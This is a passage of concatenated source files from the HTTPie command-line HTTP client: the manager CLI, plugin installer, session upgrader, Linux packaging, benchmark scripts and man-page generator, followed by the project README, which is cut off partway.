argument.copy() flags = argument.pop('flags', []) command_parser.add_argument(*flags, **map_qualifiers(argument, ARGPARSE_QUALIFIER_MAP)) group.add_argument(*flags, **argument) parser = HTTPieManagerArgumentParser( prog='httpie', description=dedent( ''' Managing interface for the HTTPie itself. <https://httpie.io/docs#manager> Be aware that you might be looking for http/https commands for sending HTTP requests. This command is only available for managing the HTTTPie plugins and the configuration around it. ''' ), ) parser.add_argument( '--debug', action='store_true', default=False, help=''' Prints the exception traceback should one occur, as well as other information useful for debugging HTTPie itself and for reporting bugs. ''' ) parser.add_argument( '--traceback', action='store_true', default=False, help=''' Prints the exception traceback should one occur. ''' ) parser.add_argument( '--version', action='version', version=__version__, help=''' Show version and exit. ''' ) man_page_hint = ''' If you are looking for the man pages of http/https commands, try one of the following: $ man http $ man https ''' options = parser_to_parser_spec(parser, man_page_hint=man_page_hint, source_file=__file__) generate_subparsers(parser, parser, COMMANDS, options) File: httpie/manager/__main__.py import argparse import sys from typing import List, Union from httpie.context import Environment from httpie.status import ExitStatus from httpie.manager.cli import parser from httpie.manager.core import MSG_COMMAND_CONFUSION, program as main_program def is_http_command(args: List[Union[str, bytes]], env: Environment) -> bool: """Check whether http/https parser can parse the arguments.""" from httpie.cli.definition import parser as http_parser from httpie.manager.cli import COMMANDS # If the user already selected a top-level sub-command, never # show the http/https version. E.g httpie plugins pie.dev/post if len(args) >= 1 and args[0] in COMMANDS: return False with env.as_silent(): try: http_parser.parse_args(env=env, args=args) except (Exception, SystemExit): return False else: return True def main(args: List[Union[str, bytes]] = sys.argv, env: Environment = Environment()) -> ExitStatus: from httpie.core import raw_main try: return raw_main( parser=parser, main_program=main_program, args=args, env=env, use_default_options=False, ) except argparse.ArgumentError: program_args = args[1:] if is_http_command(program_args, env): env.stderr.write(MSG_COMMAND_CONFUSION.format(args=' '.join(program_args)) + "\n") return ExitStatus.ERROR def program(): try: exit_status = main() except KeyboardInterrupt: exit_status = ExitStatus.ERROR_CTRL_C return exit_status if __name__ == '__main__': # pragma: nocover sys.exit(program()) File: httpie/manager/tasks/plugins.py import argparse import os import textwrap import re import shutil from collections import defaultdict from contextlib import suppress from pathlib import Path from typing import List, Optional, Tuple from httpie.manager.compat import PipError, run_pip from httpie.manager.cli import parser, missing_subcommand from httpie.compat import get_dist_name, importlib_metadata from httpie.context import Environment from httpie.status import ExitStatus from httpie.utils import get_site_paths PEP_503 = re.compile(r"[-_.]+") class PluginInstaller: def __init__(self, env: Environment, debug: bool = False) -> None: self.env = env self.dir = env.config.plugins_dir self.debug = debug self.setup_plugins_dir() def setup_plugins_dir(self) -> None: try: self.dir.mkdir( exist_ok=True, parents=True ) except OSError: self.env.stderr.write( f'Couldn\'t create "{self.dir!s}"' ' directory for plugin installation.' ' Please re-check the permissions for that directory,' ' and if needed, allow write-access.' ) raise def fail( self, command: str, target: Optional[str] = None, reason: Optional[str] = None ) -> ExitStatus: message = f'Can\'t {command}' if target: message += f' {target!r}' if reason: message += f': {reason}' self.env.stderr.write(message + '\n') return ExitStatus.ERROR def _install(self, targets: List[str], mode='install') -> Tuple[ bytes, ExitStatus ]: pip_args = [ 'install', '--prefer-binary', f'--prefix={self.dir}', '--no-warn-script-location', ] if mode == 'upgrade': pip_args.append('--upgrade') pip_args.extend(targets) try: stdout = run_pip(pip_args) except PipError as pip_error: error = pip_error stdout = pip_error.stdout else: error = None self.env.stdout.write(stdout.decode()) if error: reason = None if error.stderr: stderr = error.stderr.decode() if self.debug: self.env.stderr.write('Command failed: ') self.env.stderr.write('pip ' + ' '.join(pip_args) + '\n') self.env.stderr.write(textwrap.indent(' ', stderr)) last_line = stderr.strip().splitlines()[-1] severity, _, message = last_line.partition(': ') if severity == 'ERROR': reason = message stdout = error.stdout exit_status = self.fail(mode, ', '.join(targets), reason) else: exit_status = ExitStatus.SUCCESS return stdout, exit_status def install(self, targets: List[str]) -> ExitStatus: self.env.stdout.write(f"Installing {', '.join(targets)}...\n") self.env.stdout.flush() _, exit_status = self._install(targets) return exit_status def _clear_metadata(self, targets: List[str]) -> None: # Due to an outstanding pip problem[0], we have to get rid of # existing metadata for old versions manually. # [0]: https://github.com/pypa/pip/issues/10727 result_deps = defaultdict(list) for site_dir in get_site_paths(self.dir): for child in site_dir.iterdir(): if child.suffix in {'.dist-info', '.egg-info'}: name, _, version = child.stem.rpartition('-') result_deps[name].append((version, child)) for target in targets: name, _, version = target.rpartition('-') name = PEP_503.sub("-", name).lower().replace('-', '_') if name not in result_deps: continue for result_version, meta_path in result_deps[name]: if version != result_version: shutil.rmtree(meta_path) def upgrade(self, targets: List[str]) -> ExitStatus: self.env.stdout.write(f"Upgrading {', '.join(targets)}...\n") self.env.stdout.flush() raw_stdout, exit_status = self._install( targets, mode='upgrade' ) if not raw_stdout: return exit_status stdout = raw_stdout.decode() installation_line = stdout.splitlines()[-1] if installation_line.startswith('Successfully installed'): self._clear_metadata(installation_line.split()[2:]) def _uninstall(self, target: str) -> Optional[ExitStatus]: try: distribution = importlib_metadata.distribution(target) except importlib_metadata.PackageNotFoundError: return self.fail('uninstall', target, 'package is not installed') base_dir = Path(distribution.locate_file('.')).resolve() if self.dir not in base_dir.parents: # If the package is installed somewhere else (e.g on the site packages # of the real python interpreter), than that means this package is not # installed through us. return self.fail('uninstall', target, 'package is not installed through httpie plugins' ' interface') files = distribution.files if files is None: return self.fail('uninstall', target, 'couldn\'t locate the package') # TODO: Consider handling failures here (e.g if it fails, # just revert the operation and leave the site-packages # in a proper shape). for file in files: with suppress(FileNotFoundError): os.unlink(distribution.locate_file(file)) metadata_path = getattr(distribution, '_path', None) if ( metadata_path and metadata_path.exists() and not any(metadata_path.iterdir()) ): metadata_path.rmdir() self.env.stdout.write(f'Successfully uninstalled {target}\n') def uninstall(self, targets: List[str]) -> ExitStatus: # Unfortunately uninstall doesn't work with custom pip schemes. See: # - https://github.com/pypa/pip/issues/5595 # - https://github.com/pypa/pip/issues/4575 # so we have to implement our own uninstalling logic. Which works # on top of the importlib_metadata. exit_code = ExitStatus.SUCCESS for target in targets: exit_code |= self._uninstall(target) or ExitStatus.SUCCESS return ExitStatus(exit_code) def list(self) -> None: from httpie.plugins.registry import plugin_manager known_plugins = defaultdict(list) for entry_point in plugin_manager.iter_entry_points(self.dir): ep_info = (entry_point.group, entry_point.name) ep_name = get_dist_name(entry_point) or entry_point.module known_plugins[ep_name].append(ep_info) for plugin, entry_points in known_plugins.items(): self.env.stdout.write(plugin) version = importlib_metadata.version(plugin) if version is not None: self.env.stdout.write(f' ({version})') self.env.stdout.write('\n') for group, entry_point in sorted(entry_points): self.env.stdout.write(f' {entry_point} ({group})\n') def run( self, action: Optional[str], args: argparse.Namespace, ) -> ExitStatus: from httpie.plugins.manager import enable_plugins if action is None: parser.error(missing_subcommand('plugins')) with enable_plugins(self.dir): if action == 'install': status = self.install(args.targets) elif action == 'upgrade': status = self.upgrade(args.targets) elif action == 'uninstall': status = self.uninstall(args.targets) elif action == 'list': status = self.list() return status or ExitStatus.SUCCESS def cli_plugins(env: Environment, args: argparse.Namespace) -> ExitStatus: plugins = PluginInstaller(env, debug=args.debug) try: action = args.cli_plugins_action except AttributeError: action = args.plugins_action return plugins.run(action, args) File: httpie/manager/tasks/sessions.py import argparse from httpie.sessions import SESSIONS_DIR_NAME, get_httpie_session from httpie.status import ExitStatus from httpie.context import Environment from httpie.legacy import v3_1_0_session_cookie_format, v3_2_0_session_header_format from httpie.manager.cli import missing_subcommand, parser from httpie.utils import is_version_greater FIXERS_TO_VERSIONS = { '3.1.0': v3_1_0_session_cookie_format.fix_layout, '3.2.0': v3_2_0_session_header_format.fix_layout, } def cli_sessions(env: Environment, args: argparse.Namespace) -> ExitStatus: action = args.cli_sessions_action if action is None: parser.error(missing_subcommand('cli', 'sessions')) if action == 'upgrade': return cli_upgrade_session(env, args) elif action == 'upgrade-all': return cli_upgrade_all_sessions(env, args) else: raise ValueError(f'Unexpected action: {action}') def upgrade_session(env: Environment, args: argparse.Namespace, hostname: str, session_name: str): session = get_httpie_session( env=env, config_dir=env.config.directory, session_name=session_name, host=hostname, url=hostname, suppress_legacy_warnings=True ) session_name = session.path.stem if session.is_new(): env.log_error(f'{session_name!r} @ {hostname!r} does not exist.') return ExitStatus.ERROR fixers = [ fixer for version, fixer in FIXERS_TO_VERSIONS.items() if is_version_greater(version, session.version) ] if len(fixers) == 0: env.stdout.write(f'{session_name!r} @ {hostname!r} is already up to date.\n') return ExitStatus.SUCCESS for fixer in fixers: fixer(session, hostname, args) session.save(bump_version=True) env.stdout.write(f'Upgraded {session_name!r} @ {hostname!r} to v{session.version}\n') return ExitStatus.SUCCESS def cli_upgrade_session(env: Environment, args: argparse.Namespace) -> ExitStatus: return upgrade_session( env, args=args, hostname=args.hostname, session_name=args.session ) def cli_upgrade_all_sessions(env: Environment, args: argparse.Namespace) -> ExitStatus: session_dir_path = env.config_dir / SESSIONS_DIR_NAME status = ExitStatus.SUCCESS for host_path in session_dir_path.iterdir(): hostname = host_path.name for session_path in host_path.glob("*.json"): session_name = session_path.stem status |= upgrade_session( env, args=args, hostname=hostname, session_name=session_name ) return status File: httpie/manager/tasks/export_args.py import argparse import json from httpie.cli.definition import options from httpie.cli.options import to_data from httpie.output.writer import write_raw_data from httpie.status import ExitStatus from httpie.context import Environment FORMAT_TO_CONTENT_TYPE = { 'json': 'application/json' } def cli_export_args(env: Environment, args: argparse.Namespace) -> ExitStatus: if args.format == 'json': data = json.dumps(to_data(options)) else: raise NotImplementedError(f'Unexpected format value: {args.format}') write_raw_data( env, data, stream_kwargs={'mime_overwrite': FORMAT_TO_CONTENT_TYPE[args.format]}, ) return ExitStatus.SUCCESS File: httpie/manager/tasks/__init__.py from httpie.manager.tasks.sessions import cli_sessions from httpie.manager.tasks.export_args import cli_export_args from httpie.manager.tasks.plugins import cli_plugins from httpie.manager.tasks.check_updates import cli_check_updates CLI_TASKS = { 'sessions': cli_sessions, 'export-args': cli_export_args, 'plugins': cli_plugins, 'check-updates': cli_check_updates } File: httpie/manager/tasks/check_updates.py import argparse from httpie.context import Environment from httpie.status import ExitStatus from httpie.internal.update_warnings import fetch_updates, get_update_status def cli_check_updates(env: Environment, args: argparse.Namespace) -> ExitStatus: fetch_updates(env, lazy=False) env.stdout.write(get_update_status(env)) return ExitStatus.SUCCESS File: extras/packaging/linux/build.py import stat import subprocess from pathlib import Path from typing import Iterator, Tuple BUILD_DIR = Path(__file__).parent HTTPIE_DIR = BUILD_DIR.parent.parent.parent EXTRAS_DIR = HTTPIE_DIR / 'extras' MAN_PAGES_DIR = EXTRAS_DIR / 'man' SCRIPT_DIR = BUILD_DIR / Path('scripts') HOOKS_DIR = SCRIPT_DIR / 'hooks' DIST_DIR = BUILD_DIR / 'dist' TARGET_SCRIPTS = { SCRIPT_DIR / 'http_cli.py': [], SCRIPT_DIR / 'httpie_cli.py': ['--hidden-import=pip'], } def build_binaries() -> Iterator[Tuple[str, Path]]: for target_script, extra_args in TARGET_SCRIPTS.items(): subprocess.check_call( [ 'pyinstaller', '--onefile', '--noupx', '-p', HTTPIE_DIR, '--additional-hooks-dir', HOOKS_DIR, *extra_args, target_script, ] ) for executable_path in DIST_DIR.iterdir(): if executable_path.suffix: continue stat_r = executable_path.stat() executable_path.chmod(stat_r.st_mode | stat.S_IEXEC) yield executable_path.stem, executable_path def build_packages(http_binary: Path, httpie_binary: Path) -> None: import httpie # Mapping of src_file -> dst_file files = [ (http_binary, '/usr/bin/http'), (http_binary, '/usr/bin/https'), (httpie_binary, '/usr/bin/httpie'), ] files.extend( (man_page, f'/usr/share/man/man1/{man_page.name}') for man_page in MAN_PAGES_DIR.glob('*.1') ) # A list of additional dependencies deps = [ 'python3 >= 3.7', 'python3-pip' ] processed_deps = [ f'--depends={dep}' for dep in deps ] processed_files = [ '='.join([str(src.resolve()), dst]) for src, dst in files ] for target in ['deb', 'rpm']: subprocess.check_call( [ 'fpm', '--force', '-s', 'dir', '-t', target, '--name', 'httpie', '--version', httpie.__version__, '--description', httpie.__doc__.strip(), '--license', httpie.__licence__, *processed_deps, *processed_files, ], cwd=DIST_DIR, ) def main(): binaries = dict(build_binaries()) build_packages(binaries['http_cli'], binaries['httpie_cli']) # Rename http_cli/httpie_cli to http/httpie binaries['http_cli'].rename(DIST_DIR / 'http') binaries['httpie_cli'].rename(DIST_DIR / 'httpie') if __name__ == '__main__': main() File: extras/packaging/linux/scripts/httpie_cli.py from httpie.manager.__main__ import main if __name__ == '__main__': import sys sys.exit(main()) File: extras/packaging/linux/scripts/http_cli.py from httpie.__main__ import main if __name__ == '__main__': import sys sys.exit(main()) File: extras/packaging/linux/scripts/hooks/hook-pip.py from pathlib import Path from PyInstaller.utils.hooks import collect_all def hook(hook_api): for pkg in [ 'pip', 'setuptools', 'distutils', 'pkg_resources' ]: datas, binaries, hiddenimports = collect_all(pkg) hook_api.add_datas(datas) hook_api.add_binaries(binaries) hook_api.add_imports(*hiddenimports) File: extras/profiling/run.py """ Run the HTTPie benchmark suite with multiple environments. This script is configured in a way that, it will create two (or more) isolated environments and compare the *last commit* of this repository with it's master. > If you didn't commit yet, it won't be showing results. You can also pass --fresh, which would test the *last commit* of this repository with a fresh copy of HTTPie itself. This way even if you don't have an up-to-date master branch, you can still compare it with the upstream's master. You can also pass --complex to add 2 additional environments, which would include additional dependencies like pyOpenSSL. Examples: # Run everything as usual, and compare last commit with master $ python extras/profiling/run.py # Include complex environments $ python extras/profiling/run.py --complex # Compare against a fresh copy $ python extras/profiling/run.py --fresh # Compare against a custom branch of a custom repo $ python extras/profiling/run.py --target-repo my_repo --target-branch my_branch # Debug changes made on this script (only run benchmarks once) $ python extras/profiling/run.py --debug """ import dataclasses import shlex import subprocess import sys import tempfile import venv from argparse import ArgumentParser, FileType from contextlib import contextmanager from dataclasses import dataclass from pathlib import Path from typing import (IO, Dict, Generator, Iterable, List, Optional, Tuple) BENCHMARK_SCRIPT = Path(__file__).parent / 'benchmarks.py' CURRENT_REPO = Path(__file__).parent.parent.parent GITHUB_URL = 'https://github.com/httpie/cli.git' TARGET_BRANCH = 'master' # Additional dependencies for --complex ADDITIONAL_DEPS = ('pyOpenSSL',) def call(*args, **kwargs): kwargs.setdefault('stdout', subprocess.DEVNULL) return subprocess.check_call(*args, **kwargs) class Environment: """ Each environment defines how to create an isolated instance where we could install HTTPie and run benchmarks without any environmental factors. """ @contextmanager def on_repo(self) -> Generator[Tuple[Path, Dict[str, str]], None, None]: """ Return the path to the python interpreter and the environment variables (e.g HTTPIE_COMMAND) to be used on the benchmarks. """ raise NotImplementedError @dataclass class HTTPieEnvironment(Environment): repo_url: str branch: Optional[str] = None dependencies: Iterable[str] = () @contextmanager def on_repo(self) -> Generator[Path, None, None]: with tempfile.TemporaryDirectory() as directory_path: directory = Path(directory_path) # Clone the repo repo_path = directory / 'httpie' call( ['git', 'clone', self.repo_url, repo_path], stderr=subprocess.DEVNULL, ) if self.branch is not None: call( ['git', 'checkout', self.branch], cwd=repo_path, stderr=subprocess.DEVNULL, ) # Prepare the environment venv_path = directory / '.venv' venv.create(venv_path, with_pip=True) # Install basic dependencies python = venv_path / 'bin' / 'python' call( [ python, '-m', 'pip', 'install', 'wheel', 'pyperf==2.3.0', *self.dependencies, ] ) # Create a wheel distribution of HTTPie call([python, 'setup.py', 'bdist_wheel'], cwd=repo_path) # Install httpie distribution_path = next((repo_path / 'dist').iterdir()) call( [python, '-m', 'pip', 'install', distribution_path], cwd=repo_path, ) http = venv_path / 'bin' / 'http' yield python, {'HTTPIE_COMMAND': shlex.join([str(python), str(http)])} @dataclass class LocalCommandEnvironment(Environment): local_command: str @contextmanager def on_repo(self) -> Generator[Path, None, None]: yield sys.executable, {'HTTPIE_COMMAND': self.local_command} def dump_results( results: List[str], file: IO[str], min_speed: Optional[str] = None ) -> None: for result in results: lines = result.strip().splitlines() if min_speed is not None and "hidden" in lines[-1]: lines[-1] = ( 'Some benchmarks were hidden from this list ' 'because their timings did not change in a ' 'significant way (change was within the error ' 'margin ±{margin}%).' ).format(margin=min_speed) result = '\n'.join(lines) print(result, file=file) print("\n---\n", file=file) def compare(*args, directory: Path, min_speed: Optional[str] = None): compare_args = ['pyperf', 'compare_to', '--table', '--table-format=md', *args] if min_speed: compare_args.extend(['--min-speed', min_speed]) return subprocess.check_output( compare_args, cwd=directory, text=True, ) def run( configs: List[Dict[str, Environment]], file: IO[str], debug: bool = False, min_speed: Optional[str] = None, ) -> None: result_directory = Path(tempfile.mkdtemp()) results = [] current = 1 total = sum(1 for config in configs for _ in config.items()) def iterate(env_name, status): print( f'Iteration: {env_name} ({current}/{total}) ({status})' + ' ' * 10, end='\r', flush=True, ) for config in configs: for env_name, env in config.items(): iterate(env_name, 'setting up') with env.on_repo() as (python, env_vars): iterate(env_name, 'running benchmarks') args = [python, BENCHMARK_SCRIPT, '-o', env_name] if debug: args.append('--debug-single-value') call( args, cwd=result_directory, env=env_vars, ) current += 1 results.append(compare( *config.keys(), directory=result_directory, min_speed=min_speed )) dump_results(results, file=file, min_speed=min_speed) print('Results are available at:', result_directory) def main() -> None: parser = ArgumentParser() parser.add_argument('--local-repo', default=CURRENT_REPO) parser.add_argument('--local-branch', default=None) parser.add_argument('--target-repo', default=CURRENT_REPO) parser.add_argument('--target-branch', default=TARGET_BRANCH) parser.add_argument( '--fresh', action='store_const', const=GITHUB_URL, dest='target_repo', help='Clone the target repo from upstream GitHub URL', ) parser.add_argument( '--complex', action='store_true', help='Add a second run, with a complex python environment.', ) parser.add_argument( '--local-bin', help='Run the suite with the given local binary in addition to' ' existing runners. (E.g --local-bin $(command -v xh))', ) parser.add_argument( '--file', type=FileType('w'), default=sys.stdout, help='File to print the actual results', ) parser.add_argument( '--min-speed', help='Minimum of speed in percent to consider that a ' 'benchmark is significant' ) parser.add_argument( '--debug', action='store_true', ) options = parser.parse_args() configs = [] base_config = { options.target_branch: HTTPieEnvironment(options.target_repo, options.target_branch), 'this_branch': HTTPieEnvironment(options.local_repo, options.local_branch), } configs.append(base_config) if options.complex: complex_config = { env_name + '-complex': dataclasses.replace(env, dependencies=ADDITIONAL_DEPS) for env_name, env in base_config.items() } configs.append(complex_config) if options.local_bin: base_config['binary'] = LocalCommandEnvironment(options.local_bin) run(configs, file=options.file, debug=options.debug, min_speed=options.min_speed) if __name__ == '__main__': main() File: extras/profiling/benchmarks.py """ This file is the declaration of benchmarks for HTTPie. It is also used to run them with the current environment. Each instance of BaseRunner class will be an individual benchmark. And if run without any arguments, this file will execute every benchmark instance and report the timings. The benchmarks are run through 'pyperf', which allows to do get very precise results. For micro-benchmarks like startup, please run `pyperf system tune` to get even more accurate results. Examples: # Run everything as usual, the default is that we do 3 warm-up runs # and 5 actual runs. $ python extras/profiling/benchmarks.py # For retrieving results faster, pass --fast $ python extras/profiling/benchmarks.py --fast # For verify everything works as expected, pass --debug-single-value. # It will only run everything once, so the resuls are not reliable. But # very useful when iterating on a benchmark $ python extras/profiling/benchmarks.py --debug-single-value # If you want to run with a custom HTTPie command (for example with # and HTTPie instance installed in another virtual environment), # pass HTTPIE_COMMAND variable. $ HTTPIE_COMMAND="/my/python /my/httpie" python extras/profiling/benchmarks.py """ from __future__ import annotations import os import shlex import subprocess import sys import threading from contextlib import ExitStack, contextmanager from dataclasses import dataclass, field from functools import cached_property, partial from http.server import HTTPServer, SimpleHTTPRequestHandler from tempfile import TemporaryDirectory from typing import ClassVar, Final, List import pyperf # For download benchmarks, define a set of files. # file: (block_size, count) => total_size = block_size * count PREDEFINED_FILES: Final = {'3G': (3 * 1024 ** 2, 1024)} class QuietSimpleHTTPServer(SimpleHTTPRequestHandler): def log_message(self, *args, **kwargs): pass @contextmanager def start_server(): """Create a server to serve local files. It will create the PREDEFINED_FILES through dd.""" with TemporaryDirectory() as directory: for file_name, (block_size, count) in PREDEFINED_FILES.items(): subprocess.check_call( [ 'dd', 'if=/dev/zero', f'of={file_name}', f'bs={block_size}', f'count={count}', ], cwd=directory, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, ) handler = partial(QuietSimpleHTTPServer, directory=directory) server = HTTPServer(('localhost', 0), handler) thread = threading.Thread(target=server.serve_forever) thread.start() yield '{}:{}'.format(*server.socket.getsockname()) server.shutdown() thread.join(timeout=0.5) @dataclass class Context: benchmarks: ClassVar[List[BaseRunner]] = [] stack: ExitStack = field(default_factory=ExitStack) runner: pyperf.Runner = field(default_factory=pyperf.Runner) def run(self) -> pyperf.BenchmarkSuite: results = [benchmark.run(self) for benchmark in self.benchmarks] return pyperf.BenchmarkSuite(results) @property def cmd(self) -> List[str]: if cmd := os.getenv('HTTPIE_COMMAND'): return shlex.split(cmd) http = os.path.join(os.path.dirname(sys.executable), 'http') assert os.path.exists(http) return [sys.executable, http] @cached_property def server(self) -> str: return self.stack.enter_context(start_server()) def __enter__(self): return self def __exit__(self, *exc_info): self.stack.close() @dataclass class BaseRunner: """ An individual benchmark case. By default it has the category (e.g like startup or download) and a name. """ category: str title: str def __post_init__(self): Context.benchmarks.append(self) def run(self, context: Context) -> pyperf.Benchmark: raise NotImplementedError @property def name(self) -> str: return f'{self.title} ({self.category})' @dataclass class CommandRunner(BaseRunner): """ Run a single command, and benchmark it. """ args: List[str] def run(self, context: Context) -> pyperf.Benchmark: return context.runner.bench_command(self.name, [*context.cmd, *self.args]) @dataclass class DownloadRunner(BaseRunner): """ Benchmark downloading a single file from the remote server. """ file_name: str def run(self, context: Context) -> pyperf.Benchmark: return context.runner.bench_command( self.name, [ *context.cmd, '--download', 'GET', f'{context.server}/{self.file_name}', ], ) CommandRunner('startup', '`http --version`', ['--version']) CommandRunner('startup', '`http --offline pie.dev/get`', ['--offline', 'pie.dev/get']) for pretty in ['all', 'none']: CommandRunner( 'startup', f'`http --pretty={pretty} pie.dev/stream/1000`', [ '--print=HBhb', f'--pretty={pretty}', 'httpbin.org/stream/1000' ] ) DownloadRunner('download', '`http --download :/big_file.txt` (3GB)', '3G') def main() -> None: # PyPerf will bring it's own argument parser, so configure the script. # The somewhat fast and also precise enough configuration is this. We run # benchmarks 3 times to warm up (e.g especially for download benchmark, this # is important). And then 5 actual runs where we record. sys.argv.extend( ['--worker', '--loops=1', '--warmup=3', '--values=5', '--processes=2'] ) with Context() as context: context.run() if __name__ == '__main__': main() File: extras/scripts/generate_man_pages.py import os import re from contextlib import contextmanager from pathlib import Path from typing import Optional, Iterator, Iterable # So that httpie.cli.definition can provide man-page-specific output. Must be set before importing httpie. os.environ['HTTPIE_BUILDING_MAN_PAGES'] = '1' import httpie from httpie.cli.definition import options as core_options, IS_MAN_PAGE from httpie.cli.options import ParserSpec from httpie.manager.cli import options as manager_options from httpie.output.ui.rich_help import OptionsHighlighter, to_usage from httpie.output.ui.rich_utils import render_as_string assert IS_MAN_PAGE, 'CLI definition does not understand we’re building man pages' # Escape certain characters, so they are rendered properly on all terminals. # <https://man7.org/linux/man-pages/man7/groff_char.7.html> ESCAPE_MAP = { '"': '\[dq]', "'": '\[aq]', '~': '\(ti', '’': "\(ga", '\\': '\e', } ESCAPE_MAP = {ord(key): value for key, value in ESCAPE_MAP.items()} EXTRAS_DIR = Path(__file__).parent.parent MAN_PAGE_PATH = EXTRAS_DIR / 'man' PROJECT_ROOT = EXTRAS_DIR.parent OPTION_HIGHLIGHT_RE = re.compile( OptionsHighlighter.highlights[0] ) class ManPageBuilder: def __init__(self): self.source = [] def title_line( self, full_name: str, program_name: str, program_version: str, last_edit_date: str, ) -> None: self.source.append( f'.TH {program_name} 1 "{last_edit_date}" ' f'"{full_name} {program_version}" "{full_name} Manual"' ) def set_name(self, program_name: str) -> None: with self.section('NAME'): self.write(program_name) def write(self, text: str, *, bold: bool = False) -> None: if bold: text = '.B ' + text self.source.append(text) def separate(self) -> None: self.source.append('.PP') def format_desc(self, desc: str) -> str: description = _escape_and_dedent(desc) description = OPTION_HIGHLIGHT_RE.sub( # Boldify the option part, but don't remove the prefix (start of the match). lambda match: match[1] + self.boldify(match['option']), description ) return description def add_comment(self, comment: str) -> None: self.source.append(f'.\\" {comment}') def add_options(self, options: Iterable[str], *, metavar: Optional[str] = None) -> None: text = ", ".join(map(self.boldify, options)) if metavar: text += f' {self.underline(metavar)}' self.write(f'.IP "{text}"') def build(self) -> str: return '\n'.join(self.source) @contextmanager def section(self, section_name: str) -> Iterator[None]: self.write(f'.SH {section_name}') self.in_section = True yield self.in_section = False def underline(self, text: str) -> str: return r'\fI\,{}\/\fR'.format(text) def boldify(self, text: str) -> str: return r'\fB\,{}\/\fR'.format(text) def _escape_and_dedent(text: str) -> str: lines = [] for should_act, line in enumerate(text.splitlines()): # Only dedent after the first line. if should_act: if line.startswith(' '): line = line[4:] lines.append(line) return '\n'.join(lines).translate(ESCAPE_MAP) def to_man_page(program_name: str, spec: ParserSpec, *, is_top_level_cmd: bool = False) -> str: builder = ManPageBuilder() builder.add_comment( f"This file is auto-generated from the parser declaration " + (f"in {Path(spec.source_file).relative_to(PROJECT_ROOT)} " if spec.source_file else "") + f"by {Path(__file__).relative_to(PROJECT_ROOT)}." ) builder.title_line( full_name='HTTPie', program_name=program_name, program_version=httpie.__version__, last_edit_date=httpie.__date__, ) builder.set_name(program_name) with builder.section('SYNOPSIS'): # `http` and `https` are commands that can be directly used, so they can have # a valid usage. But `httpie` is a top-level command with multiple sub commands, # so for the synopsis we'll only reference the `httpie` name. if is_top_level_cmd: synopsis = program_name else: synopsis = render_as_string(to_usage(spec, program_name=program_name)) builder.write(synopsis) with builder.section('DESCRIPTION'): builder.write(spec.description) if spec.man_page_hint: builder.write(spec.man_page_hint) for index, group in enumerate(spec.groups, 1): with builder.section(group.name): if group.description: builder.write(group.description) for argument in group.arguments: if argument.is_hidden: continue raw_arg = argument.serialize(isolation_mode=True) metavar = raw_arg.get('metavar') if raw_arg.get('is_positional'): # In case of positional arguments, metavar is always equal # to the list of options (e.g `METHOD`). metavar = None builder.add_options(raw_arg['options'], metavar=metavar) desc = builder.format_desc(raw_arg.get('description', '')) builder.write('\n' + desc + '\n') builder.separate() if spec.epilog: with builder.section('SEE ALSO'): builder.write(builder.format_desc(spec.epilog)) return builder.build() def main() -> None: for program_name, spec, config in [ ('http', core_options, {}), ('https', core_options, {}), ('httpie', manager_options, {'is_top_level_cmd': True}), ]: with open((MAN_PAGE_PATH / program_name).with_suffix('.1'), 'w') as stream: stream.write(to_man_page(program_name, spec, **config)) if __name__ == '__main__': main()
<h2 align="center"> <a href="https://httpie.io" target="blank_"> <img height="100" alt="HTTPie" src="https://raw.githubusercontent.com/httpie/cli/master/docs/httpie-logo.svg" /> </a> <br> HTTPie CLI: human-friendly HTTP client for the API era </h2> <div align="center"> [![HTTPie for Desktop](https://img.shields.io/static/v1?label=HTTPie&message=Desktop&color=4B78E6)](https://httpie.io/product) [![](https://img.shields.io/static/v1?label=HTTPie&message=Web%20%26%20Mobile&color=73DC8C)](https://httpie.io/app) [![](https://img.shields.io/static/v1?label=HTTPie&message=CLI&color=FA9BFA)](https://httpie.io/cli) [![Twitter](https://img.shields.io/twitter/follow/httpie?style=flat&color=%234B78E6&logoColor=%234B78E6)](https://twitter.com/httpie) [![Chat](https://img.shields.io/discord/725351238698270761?style=flat&label=Chat%20on%20Discord&color=%23FA9BFA)](https://httpie.io/discord) </div> <div align="center"> [![Docs](https://img.shields.io/badge/stable%20docs-httpie.io%2Fdocs%2Fcli-brightgreen?style=flat&color=%2373DC8C&label=Docs)](https://httpie.org/docs/cli) [![Latest version](https://img.shields.io/pypi/v/httpie.svg?style=flat&label=Latest&color=%234B78E6&logo=&logoColor=white)](https://pypi.python.org/pypi/httpie) [![Build](https://img.shields.io/github/actions/workflow/status/httpie/cli/tests.yml?branch=master&color=%23FA9BFA&label=Build)](https://github.com/httpie/cli/actions) [![Coverage](https://img.shields.io/codecov/c/github/httpie/cli?style=flat&label=Coverage&color=%2373DC8C)](https://codecov.io/gh/httpie/cli) [![PyPi downloads](https://img.shields.io/pepy/dt/httpie?style=flat&label=Downloads%20from%20PyPi%20only&color=4B78E6)](https://www.pepy.tech/projects/httpie) </div> HTTPie (pronounced _aitch-tee-tee-pie_) is a command-line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. HTTPie is designed for testing, debugging, and generally interacting with APIs & HTTP servers. The `http` & `https` commands allow for creating and sending arbitrary HTTP requests. They use simple and natural syntax and provide formatted and colorized output. <div align="center"> <img src="https://raw.githubusercontent.com/httpie/cli/master/docs/httpie-animation.gif" alt="HTTPie in action" width="100%"/> </div> ## We lost 54k GitHub stars Please note we recently accidentally made this repo private for a moment, and GitHub deleted our community that took a decade to build. Read the full story here: https://httpie.io/blog/stardust ![](docs/stardust.png) ## Getting started - [Installation instructions →](https://httpie.io/docs#installation) - [Full documentation →](https://httpie.io/docs) ## Features - Expressive and intuitive syntax - Formatted and colorized terminal output - Built-in JSON support - Forms and file uploads - HTTPS, proxies, and authentication - Arbitrary request data - Custom headers - Persistent sessions - `wget`-like downloads [See all features →](https://httpie.io/docs) ## Examples Hello World: ```bash https httpie.io/hello ``` Custom [HTTP method](https://httpie.io/docs#http-method), [HTTP headers](https://httpie.io/docs#http-headers) and [JSON](https://httpie.io/docs#json) data: ```bash http PUT pie.dev/put X-API-Token:123 name=John ``` Build and print a request without sending it using [offline mode](https://httpie.io/docs/cli/offline-mode): ```bash http --offline pie.dev/post hello=offline ``` Use [GitHub API](https://developer.github.com/v3/issues/comments/#create-a-comment) to post a comment on an [Issue](https://github.com/httpie/cli/issues/83) with [authentication](https://httpie.io/docs#authentication): ```bash http -a USERNAME POST https://api.github.com/repos/httpie/cli/issues/83/comments body='HTTPie is awesome! :heart:' ``` [See more examples →](https://httpie.io/docs#examples) ## Community & support - 